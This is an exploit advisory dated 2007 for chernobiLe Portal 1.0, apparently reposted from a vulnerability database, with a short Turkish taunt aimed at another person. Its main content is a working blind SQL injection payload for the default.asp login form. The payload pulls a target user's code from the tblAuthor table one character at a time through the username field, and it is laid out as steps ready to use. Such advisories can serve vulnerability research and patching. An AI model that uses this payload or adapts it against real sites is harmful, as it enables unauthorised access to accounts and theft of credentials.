chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

2007-01-27 00:00:00

*******************************************************************************
# Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$ : Not Free,Private


# Info : /*
Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
*\

*******************************************************************************

[[SQL]]]

http://[target]/[path]//default.asp (POST Method) [SQL]

Example:

Method: One Char Brute Force Technique

First,Please Register Before:

User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/*
Pass:[userpass]

If Login True Then First Character = A
elSe Continue...

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

#

Fixes

No fixes

In order to submit a new fix you need to be registered.